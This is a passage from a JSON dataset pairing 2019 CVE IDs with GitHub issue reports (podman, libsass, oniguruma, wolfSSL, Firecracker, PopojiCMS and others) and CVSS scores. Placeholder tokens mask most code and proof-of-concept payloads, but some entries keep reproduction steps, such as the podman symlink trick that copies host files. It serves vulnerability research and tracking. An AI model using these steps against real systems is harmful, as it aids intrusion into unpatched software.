  40334. "description": "security: SNYK JS CLASSVALIDATOR NUMBERTAG Description APITAG URLTAG Affected versions of this package are vulnerable to Improper Input Validation via bypassing the input validation in APITAG which can lead to cross site scripting (XSS) or SQL injection. NOTE: There is an optional APITAG parameter that can be used to reduce the risk of this bypass.",
  40335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40336. "severity": "CRITICAL",
  40337. "baseScore": 9.8,
  40338. "impactScore": 5.9,
  40339. "exploitabilityScore": 3.9
  40340. },
  40341. {
  40342. "CVE_ID": "CVE-2019-18466",
  40343. "Issue_Url_old": "https://github.com/containers/libpod/issues/3829",
  40344. "Issue_Url_new": "https://github.com/containers/podman/issues/3829",
  40345. "Repo_new": "containers/podman",
  40346. "Issue_Created_At": "2019-08-15T19:51:23Z",
  40347. "description": "podman cp dereferences symlink in host context after APITAG APITAG Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description APITAG podman cp mycontainer:/testfile /tmp/test may resolve a symlink in the host context (e.g. the file PATHTAG ) and copy it into the directory PATHTAG Steps to reproduce the issue: erik APITAG cat FILETAG container=$(buildah from scratch) mnt=$(buildah mount $container) touch \"$mnt/file \" ln s \"/file \" \"$mnt/testfile\" ln s PATHTAG APITAG buildah umount $container buildah commit $container glob1 erik APITAG rm rf /tmp/test && mkdir /tmp/test erik APITAG buildah unshare bash PATHTAG && container=$(podman create localhost/glob1 dummycmd) && podman cp $container:/testfile /tmp/test APITAG Getting image source signatures Copying blob dada6d NUMBERTAG fa NUMBERTAG done Copying config NUMBERTAG af1d7c9 done Writing manifest to image destination Storing signatures APITAG erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG ls l /etc/hosts rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG etc/hosts erik APITAG diff PATHTAG /etc/hosts erik APITAG Describe the results you received: erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG Describe the results you expected: I would not have expected to see the files PATHTAG and PATHTAG _ Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : ERRORTAG Output of APITAG : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): erik APITAG buildah version buildah version NUMBERTAG image spec NUMBERTAG runtime spec NUMBERTAG dev) erik APITAG cat /etc/issue Ubuntu NUMBERTAG LTS \\l",
  40348. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  40349. "severity": "MEDIUM",
  40350. "baseScore": 5.5,
  40351. "impactScore": 3.6,
  40352. "exploitabilityScore": 1.8
  40353. },
  40354. {
  40355. "CVE_ID": "CVE-2019-18662",
  40356. "Issue_Url_old": "https://github.com/YouPHPTube/YouPHPTube/issues/2202",
  40357. "Issue_Url_new": "https://github.com/wwbn/avideo/issues/2202",
  40358. "Repo_new": "wwbn/avideo",
  40359. "Issue_Created_At": "2019-10-31T18:26:26Z",
  40360. "description": "SQL Injection in APITAG plugin. User input passed through the \"live_stream_code\" POST parameter to PATHTAG is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in band SQL Injection attacks. Successful exploitation of this vulnerability requires the APITAG Chat\" plugin to be enabled. Proof of Concept: ERRORTAG",
  40361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40362. "severity": "CRITICAL",
  40363. "baseScore": 9.8,
  40364. "impactScore": 5.9,
  40365. "exploitabilityScore": 3.9
  40366. },
  40367. {
  40368. "CVE_ID": "CVE-2019-18797",
  40369. "Issue_Url_old": "https://github.com/sass/libsass/issues/3000",
  40370. "Issue_Url_new": "https://github.com/sass/libsass/issues/3000",
  40371. "Repo_new": "sass/libsass",
  40372. "Issue_Created_At": "2019-10-07T14:44:16Z",
  40373. "description": "Stack Overflow in sassc. We found Stack Overflow in sassc binary and sassc is compiled with clang enabling ASAN. Machine Setup APITAG Compilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
  40374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40375. "severity": "MEDIUM",
  40376. "baseScore": 6.5,
  40377. "impactScore": 3.6,
  40378. "exploitabilityScore": 2.8
  40379. },
  40380. {
  40381. "CVE_ID": "CVE-2019-18798",
  40382. "Issue_Url_old": "https://github.com/sass/libsass/issues/2999",
  40383. "Issue_Url_new": "https://github.com/sass/libsass/issues/2999",
  40384. "Repo_new": "sass/libsass",
  40385. "Issue_Created_At": "2019-10-07T14:36:59Z",
  40386. "description": "Heap Buffer Overflow in sassc. We found a vulnerability in sassc binary and sassc is compiled with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
  40387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40388. "severity": "MEDIUM",
  40389. "baseScore": 6.5,
  40390. "impactScore": 3.6,
  40391. "exploitabilityScore": 2.8
  40392. },
  40393. {
  40394. "CVE_ID": "CVE-2019-18799",
  40395. "Issue_Url_old": "https://github.com/sass/libsass/issues/3001",
  40396. "Issue_Url_new": "https://github.com/sass/libsass/issues/3001",
  40397. "Repo_new": "sass/libsass",
  40398. "Issue_Created_At": "2019-10-07T14:51:08Z",
  40399. "description": "SEGV in sassc. We found Heap Buffer Overflow in sassc binary and sassc is compiled with clang enabling ASAN. Machine Setup APITAG Compilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
  40400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40401. "severity": "MEDIUM",
  40402. "baseScore": 6.5,
  40403. "impactScore": 3.6,
  40404. "exploitabilityScore": 2.8
  40405. },
  40406. {
  40407. "CVE_ID": "CVE-2019-18815",
  40408. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/22",
  40409. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/22",
  40410. "Repo_new": "popojicms/popojicms",
  40411. "Issue_Created_At": "2019-10-19T06:27:43Z",
  40412. "description": "Open Redirection Vulnerability. Hi, MENTIONTAG and I found open redirection vulnerability on the APITAG The vulnerable code is on FILETAG file line number NUMBERTAG FILETAG",
  40413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40414. "severity": "MEDIUM",
  40415. "baseScore": 6.1,
  40416. "impactScore": 2.7,
  40417. "exploitabilityScore": 2.8
  40418. },
  40419. {
  40420. "CVE_ID": "CVE-2019-18816",
  40421. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/21",
  40422. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/21",
  40423. "Repo_new": "popojicms/popojicms",
  40424. "Issue_Created_At": "2019-10-18T17:21:47Z",
  40425. "description": "Stored XSS on Post feature. Hi, MENTIONTAG and I found a stored XSS vulnerability on the Post feature. By intercepting the request, we are able to edit the request body to insert a XSS payload. FILETAG",
  40426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40427. "severity": "MEDIUM",
  40428. "baseScore": 6.1,
  40429. "impactScore": 2.7,
  40430. "exploitabilityScore": 2.8
  40431. },
  40432. {
  40433. "CVE_ID": "CVE-2019-18817",
  40434. "Issue_Url_old": "https://github.com/istio/istio/issues/18229",
  40435. "Issue_Url_new": "https://github.com/istio/istio/issues/18229",
  40436. "Repo_new": "istio/istio",
  40437. "Issue_Created_At": "2019-10-23T15:46:28Z",
  40438. "description": "Istio Sidecar consuming high CPU Istio NUMBERTAG Bug description We are running Istio NUMBERTAG this also happend on NUMBERTAG most of our applications are running fine. However, in one of our deployments the CPU on the sidecar is pegged at NUMBERTAG for the life of the pod. This happens for the majority of the pods in the same deployment but not all. The pod contains nginx, istio proxy and an application container all of which have normal CPU use except istio proxy. I turned on debugging on the sidecar however there are not really interesting. CODETAG I was able to collect an strace from the PID of the problematic pod ERRORTAG Here is the output of kubectl n $namespace exec it $pod c istio proxy top on a pod with busy envoy ERRORTAG strace f r p NUMBERTAG ERRORTAG There has been a forum thread about it, but this is now ongoing without any resolution. So far the only workaround has been to downgrade the sidecar to NUMBERTAG URLTAG Any ideas on how I can troubleshoot further? Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [x ] Performance and Scalability [ ] Policies and Telemetry [ ] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastructure Expected behavior CPU not going high Steps to reproduce the bug Unable to reproduce Version (include the output of APITAG and kubectl version ) citadel version NUMBERTAG galley version NUMBERTAG ingressgateway version NUMBERTAG pilot version NUMBERTAG policy version NUMBERTAG sidecar injector version NUMBERTAG telemetry version NUMBERTAG How was Istio installed? helm chart Environment where bug was observed (cloud vendor, OS, etc) amazon eks Additionally, please consider attaching a [cluster state archive CVETAG by attaching the dump file to this issue.",
  40439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40440. "severity": "HIGH",
  40441. "baseScore": 7.5,
  40442. "impactScore": 3.6,
  40443. "exploitabilityScore": 3.9
  40444. },
  40445. {
  40446. "CVE_ID": "CVE-2019-18840",
  40447. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2555",
  40448. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2555",
  40449. "Repo_new": "wolfssl/wolfssl",
  40450. "Issue_Created_At": "2019-11-04T17:01:40Z",
  40451. "description": "Heap based buffer overflow while parsing crafted NUMBERTAG certificates. APITAG in versions NUMBERTAG and NUMBERTAG incorrectly handles NUMBERTAG certificates leading to a heap buffer overflow inside the APITAG structure, overwriting a NULL pointer and as a result crash during memory deallocation. This vulnerability affects both client and server in two supported protocols: TLS and DTLS. During processing of a crafted certificate, APITAG incorrectly handles the loc buffer in the APITAG structure. In the following line the count variable reaches value NUMBERTAG while the loc table has fixed size NUMBERTAG PATHTAG > > APITAG >loc FILETAG",
  40452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40453. "severity": "HIGH",
  40454. "baseScore": 7.5,
  40455. "impactScore": 3.6,
  40456. "exploitabilityScore": 3.9
  40457. },
  40458. {
  40459. "CVE_ID": "CVE-2019-18841",
  40460. "Issue_Url_old": "https://github.com/ankane/chartkick.js/issues/117",
  40461. "Issue_Url_new": "https://github.com/ankane/chartkick.js/issues/117",
  40462. "Repo_new": "ankane/chartkick.js",
  40463. "Issue_Created_At": "2019-11-10T00:11:31Z",
  40464. "description": "Prototype Pollution in FILETAG NUMBERTAG Under certain conditions, the NUMBERTAG series of FILETAG is vulnerable to prototype pollution. This is same type of issue that was announced for APITAG URLTAG and other popular libraries earlier this year. APITAG rated this a \"minor vulnerability\" URLTAG . It's certainly unintended behavior, but since FILETAG is a client side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact Passing untrusted input to APITAG and the result to FILETAG can pollute APITAG . CODETAG A specially crafted response in data loaded via URL can cause pollution well. APITAG All users running an affected release should upgrade immediately.",
  40465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  40466. "severity": "HIGH",
  40467. "baseScore": 7.3,
  40468. "impactScore": 3.4,
  40469. "exploitabilityScore": 3.9
  40470. },
  40471. {
  40472. "CVE_ID": "CVE-2019-18844",
  40473. "Issue_Url_old": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
  40474. "Issue_Url_new": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
  40475. "Repo_new": "projectacrn/acrn-hypervisor",
  40476. "Issue_Created_At": "2019-06-12T08:24:06Z",
  40477. "description": "Assert usages issue in device model from KW work.. Assert usages issue in device model from KW work.",
  40478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40479. "severity": "HIGH",
  40480. "baseScore": 7.5,
  40481. "impactScore": 3.6,
  40482. "exploitabilityScore": 3.9
  40483. },
  40484. {
  40485. "CVE_ID": "CVE-2019-18850",
  40486. "Issue_Url_old": "https://github.com/trustedsec/trevorc2/issues/18",
  40487. "Issue_Url_new": "https://github.com/trustedsec/trevorc2/issues/18",
  40488. "Repo_new": "trustedsec/trevorc2",
  40489. "Issue_Created_At": "2019-12-03T17:36:59Z",
  40490. "description": "APITAG NUMBERTAG Fingerprinting Vulnerability. APITAG NUMBERTAG fails to prevent fingerprinting primarily via a discrepancy between response headers when responding to different HTTP methods, also via predictable unique responses when accessing and interacting with the \"SITE_PATH_QUERY\". CVETAG Gionathan Armando Reale, Deloitte DK",
  40491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  40492. "severity": "HIGH",
  40493. "baseScore": 7.5,
  40494. "impactScore": 3.6,
  40495. "exploitabilityScore": 3.9
  40496. },
  40497. {
  40498. "CVE_ID": "CVE-2019-18954",
  40499. "Issue_Url_old": "https://github.com/NetEase/pomelo/issues/1149",
  40500. "Issue_Url_new": "https://github.com/netease/pomelo/issues/1149",
  40501. "Repo_new": "netease/pomelo",
  40502. "Issue_Created_At": "2019-11-08T00:04:23Z",
  40503. "description": "A vulnerability in pomelo. We found that pomelo allows external control of critical state data. A malicious user input can corrupt arbitrary methods and attributes in PATHTAG because certain internal attributes can be overwritten via a conflicting name. Hence, a malicious attacker can launch attacks by adding additional attributes to user input. A detailed discussion of the vulnerability can be found here.",
  40504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  40505. "severity": "MEDIUM",
  40506. "baseScore": 5.3,
  40507. "impactScore": 1.4,
  40508. "exploitabilityScore": 3.9
  40509. },
  40510. {
  40511. "CVE_ID": "CVE-2019-18960",
  40512. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/1462",
  40513. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/1462",
  40514. "Repo_new": "firecracker-microvm/firecracker",
  40515. "Issue_Created_At": "2019-12-09T22:22:37Z",
  40516. "description": "Firecracker vsock implementation buffer overflow in versions NUMBERTAG and NUMBERTAG that can result in potentially exploitable crashes.. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG sock implementation. Issue Description A logical error in bounds checking performed on vsock virtio descriptors can be used by a malicious guest to read from and write to a segment of the host side Firecracker process' heap address space, directly after the end of a guest memory region. For reads, the accessible segment's size is NUMBERTAG APITAG For writes, the accessible segment is limited by the host Linux kernel to a size defined in APITAG . We expect the value of APITAG to be on the order of a few hundred APITAG to a few APITAG Impact This will generally result in a segmentation fault, but remote code execution within the Firecracker host side process context cannot be ruled out. Vulnerable Systems Only Firecracker NUMBERTAG and NUMBERTAG are affected. Only Firecracker APITAG with configured vsock devices are affected, and only if one or more vsock devices are in active use by both host and guest. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will see the impact limited as follows: a malicious APITAG guest that would manage to compromise the Firecracker VMM process would be restricted to running on the host as an unprivileged user, in a chroot and mount namespace isolated from the host's filesystem, in a separate pid namespace, in a separate network namespace, with system calls limited to Firecracker's seccomp whitelist, on a single NUMA node, and on a cgroups limited number of CPU cores. Mitigation Firecracker NUMBERTAG and Firecracker NUMBERTAG released on NUMBERTAG addresses this issue. The fix has also been applied to Firecracker's master branch. If you are using Firecracker NUMBERTAG or NUMBERTAG we recommend you update to NUMBERTAG or NUMBERTAG as soon as possible. If you are using Firecracker NUMBERTAG or below, you do not need to take any action. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will limit the impact to the attacker's Firecracker process NUMBERTAG FILETAG NUMBERTAG FILETAG",
  40517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40518. "severity": "CRITICAL",
  40519. "baseScore": 9.8,
  40520. "impactScore": 5.9,
  40521. "exploitabilityScore": 3.9
  40522. },
  40523. {
  40524. "CVE_ID": "CVE-2019-19012",
  40525. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/164",
  40526. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/164",
  40527. "Repo_new": "kkos/oniguruma",
  40528. "Issue_Created_At": "2019-11-08T11:05:59Z",
  40529. "description": "Integer overflow related to reg >dmax in search_in_range (regexec.c). Hello, I found an integer overflow in search_in_range at APITAG CODETAG reg >dmax is max repeat num, whose type is unsigned int. ONIG_MAX_REPEAT_NUM is NUMBERTAG but it can be multiplied into a very large number with distance_multiply at: CODETAG And Sch_range is a pointer. So if compiled in NUMBERTAG bit, sch_range += reg >dmax results into integer overflow. There should be other places related to reg >dmax/dmin which are vulnerable to integer overflow. APITAG ERRORTAG Compilation: CODETAG Output with pattern NUMBERTAG and string = x: ERRORTAG In sunday_quick_search, the APITAG gets crashed because p points to an invalid memory address. If it does not crash, p luckily points to a valid memory address. That it crashes or does not crash depends on the supplied pattern. This bug at least can be used to detect if the target system is NUMBERTAG bit or not. And if the target system is NUMBERTAG bit, is the KASLR is enable or not (constantly crashes or constantly no crashes means no KASLR). Thanks & Regards, Nguy\u1ec5n \u0110\u1ee9c M\u1ea1nh [E] v. EMAILTAG",
  40530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40531. "severity": "CRITICAL",
  40532. "baseScore": 9.8,
  40533. "impactScore": 5.9,
  40534. "exploitabilityScore": 3.9
  40535. },
  40536. {
  40537. "CVE_ID": "CVE-2019-19040",
  40538. "Issue_Url_old": "https://github.com/kairosdb/kairosdb/issues/569",
  40539. "Issue_Url_new": "https://github.com/kairosdb/kairosdb/issues/569",
  40540. "Repo_new": "kairosdb/kairosdb",
  40541. "Issue_Created_At": "2019-10-24T21:22:52Z",
  40542. "description": "Reflect Cross site Scripting on error message (WEB UI / FILETAG , APITAG Hello, I want to report a Reflect Cross site scripting issue on APITAG . Vulnerability A function call on FILETAG , Line NUMBERTAG URLTAG will append error message by ERRORTAG function. ERRORTAG function was declared in FILETAG The error message will append to html without any escape. ERRORTAG So we can create a malicious error query and then trigger the XSS easily: APITAG APITAG FILETAG ) Fix You can escape the malicious code or fix with url encode APITAG before append to html. Best Regards.",
  40543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40544. "severity": "MEDIUM",
  40545. "baseScore": 6.1,
  40546. "impactScore": 2.7,
  40547. "exploitabilityScore": 2.8
  40548. },
  40549. {
  40550. "CVE_ID": "CVE-2019-19084",
  40551. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5971",
  40552. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5971",
  40553. "Repo_new": "octopusdeploy/issues",
  40554. "Issue_Created_At": "2019-11-05T04:10:15Z",
  40555. "description": "Placeholder Issue. Details coming soon URLTAG",
  40556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  40557. "severity": "MEDIUM",
  40558. "baseScore": 4.3,
  40559. "impactScore": 1.4,
  40560. "exploitabilityScore": 2.8
  40561. },
  40562. {
  40563. "CVE_ID": "CVE-2019-19085",
  40564. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5961",
  40565. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5961",
  40566. "Repo_new": "octopusdeploy/issues",
  40567. "Issue_Created_At": "2019-11-04T04:11:46Z",
  40568. "description": "Placeholder Issue. Details coming soon URLTAG",
  40569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  40570. "severity": "MEDIUM",
  40571. "baseScore": 5.4,
  40572. "impactScore": 2.7,
  40573. "exploitabilityScore": 2.3
  40574. },
  40575. {
  40576. "CVE_ID": "CVE-2019-19113",
  40577. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/1",
  40578. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/1",
  40579. "Repo_new": "newbee-ltd/newbee-mall",
  40580. "Issue_Created_At": "2019-10-19T16:20:39Z",
  40581. "description": "SQL Injection in APITAG . PATHTAG CODETAG Where ${keyword} is used for splicing sql statements, there is a risk of SQL injection. poc\uff1a > URLTAG We will find a sql error, which proves that the vulnerability already exists.",
  40582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40583. "severity": "CRITICAL",
  40584. "baseScore": 9.8,
  40585. "impactScore": 5.9,
  40586. "exploitabilityScore": 3.9
  40587. },
  40588. {
  40589. "CVE_ID": "CVE-2019-19203",
  40590. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/163",
  40591. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/163",
  40592. "Repo_new": "kkos/oniguruma",
  40593. "Issue_Created_At": "2019-11-06T09:39:01Z",
  40594. "description": "heap buffer overflow in gb NUMBERTAG mbc_enc_len. In gb NUMBERTAG mbc_enc_len, p ++ then p is dereferenced without checking if it passes the end of string, which leads to heap buffer overflow. CODETAG APITAG ERRORTAG Compilation: CODETAG Output of APITAG ERRORTAG",
  40595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40596. "severity": "HIGH",
  40597. "baseScore": 7.5,
  40598. "impactScore": 3.6,
  40599. "exploitabilityScore": 3.9
  40600. },
  40601. {
  40602. "CVE_ID": "CVE-2019-19204",
  40603. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/162",
  40604. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/162",
  40605. "Repo_new": "kkos/oniguruma",
  40606. "Issue_Created_At": "2019-11-06T07:43:08Z",
  40607. "description": "heap buffer overflow in fetch_interval_quantifier due to double PFETCH. At APITAG in fetch_interval_quantifier, PFETCH is called without checking PEND: APITAG This leads to heap buffer overflow. APITAG ERRORTAG Compilation of oniguruma and APITAG APITAG Output of APITAG ERRORTAG",
  40608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40609. "severity": "HIGH",
  40610. "baseScore": 7.5,
  40611. "impactScore": 3.6,
  40612. "exploitabilityScore": 3.9
  40613. },
  40614. {
  40615. "CVE_ID": "CVE-2019-19221",
  40616. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1276",
  40617. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1276",
  40618. "Repo_new": "libarchive/libarchive",
  40619. "Issue_Created_At": "2019-11-07T03:40:18Z",
  40620. "description": "bsdtar: An error in APITAG (archive_string.c) allows out of bounds read memory access and subsequently cause a crash. bsdtar: An error in APITAG (archive_string.c) triggers an out of bounds read memory access that results into a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: Version of libarchive: libarchive NUMBERTAG libarchive NUMBERTAG dev How you obtained it: build from source libarchive NUMBERTAG tar.gz ( URLTAG libarchive NUMBERTAG dev ( URLTAG Tested operating system and version: Linu NUMBERTAG generic NUMBERTAG Tested compilers versions: gcc (version NUMBERTAG and clang (version NUMBERTAG ubuntu2) What other files were involved? To trigger the bug, the crashing input file (crash_file NUMBERTAG is attached with this report. ============ Command to reproduce the bug using valgrind: $ valgrind v ./bsdtar t f crash_file NUMBERTAG Output (partial): ERRORTAG Possible cause: In APITAG (archive_string.c): CODETAG APITAG function is called with the following parameter values: wcs_length NUMBERTAG mbs_length NUMBERTAG mbs NUMBERTAG ffff6a NUMBERTAG ffe NUMBERTAG r = mbrtowc(wcs, mbs, wcs_length, &shift_state); Here, \"mbs\" has a length of NUMBERTAG byte, while, APITAG tends to read NUMBERTAG bytes (wcs_length NUMBERTAG thus resulting into memory out of bounds read. The program crashes due to memory access violation, which can cause denial of service. The values {wcs_length NUMBERTAG mbs_length NUMBERTAG are reached, if return value of APITAG is r NUMBERTAG or r NUMBERTAG in the previous iteration of the while loop. \"mbs\" pointer increases (++mbs), and \"mbs_length\" length decreases ( mbs_length), but wcs_length remains constant NUMBERTAG bytes in this case).",
  40621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40622. "severity": "MEDIUM",
  40623. "baseScore": 5.5,
  40624. "impactScore": 3.6,
  40625. "exploitabilityScore": 1.8
  40626. },
  40627. {
  40628. "CVE_ID": "CVE-2019-19240",
  40629. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/290",
  40630. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/290",
  40631. "Repo_new": "embedthis/goahead",
  40632. "Issue_Created_At": "2019-11-22T02:06:21Z",
  40633. "description": "APITAG information disclosure. Overview A security vulnerability affecting APITAG versions up to, and including NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary The APITAG function is vulnerable to very long host names which may cause unwanted disclosure of internal APITAG data. Discussion The APITAG web server has a vulnerability in processing redirected HTTP requests when supplied with a very large Host header. The APITAG APITAG uses a static host buffer of limited length. This can overflow with redirected requests when provided with a very long HTTP Host header. This can cause a copy of the host header to fail leaving the static host buffer uninitialized which may leak uninitialized data in the response. Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG or later. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE TBD Thanks Thanks to Shuai Zhang and from Dbappsecurity.",
  40634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40635. "severity": "MEDIUM",
  40636. "baseScore": 5.3,
  40637. "impactScore": 1.4,
  40638. "exploitabilityScore": 3.9
  40639. },
  40640. {
  40641. "CVE_ID": "CVE-2019-19240",
  40642. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/289",
  40643. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/289",
  40644. "Repo_new": "embedthis/goahead",
  40645. "Issue_Created_At": "2019-11-22T01:59:04Z",
  40646. "description": "APITAG disclosure with large host names. In function APITAG it doesn\u2019t check the return value of scopy in line NUMBERTAG goahead version NUMBERTAG if the length of host is more than ME_GOAHEAD_LIMIT_STRING NUMBERTAG it will fail to copy the host string and will cause hostbuf uninitialized. And then the hostbuf will be added into uri and will be printed in line NUMBERTAG It might leak the stack address, heap address and libc address in the stack. APITAG versions NUMBERTAG and NUMBERTAG up to NUMBERTAG All hardware platforms. To reproduce, provide a very long hostname in the HTTP headers. FILETAG",
  40647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40648. "severity": "MEDIUM",
  40649. "baseScore": 5.3,
  40650. "impactScore": 1.4,
  40651. "exploitabilityScore": 3.9
  40652. },
  40653. {
  40654. "CVE_ID": "CVE-2019-19269",
  40655. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/861",
  40656. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/861",
  40657. "Repo_new": "proftpd/proftpd",
  40658. "Issue_Created_At": "2019-11-04T16:10:29Z",
  40659. "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG master HEAD. This is the NUMBERTAG th of NUMBERTAG bugs in the APITAG function. The code fails to take into account an empty CRL, for which APITAG returned NULL in my tests. It proceeds to dereferencing the NULL pointer, crashing the application. My patch is as follows: CODETAG Both of the other code bases which I noticed were getting the issuer CRL lookup right (second bug, issue NUMBERTAG fail to check the return value against NULL as well: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this crash in the summer of NUMBERTAG after fixing the first crash (issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
  40661. "severity": "MEDIUM",
  40662. "baseScore": 4.9,
  40663. "impactScore": 3.6,
  40664. "exploitabilityScore": 1.2
  40665. },
  40666. {
  40667. "CVE_ID": "CVE-2019-19270",
  40668. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/859",
  40669. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/859",
  40670. "Repo_new": "proftpd/proftpd",
  40671. "Issue_Created_At": "2019-11-04T16:08:50Z",
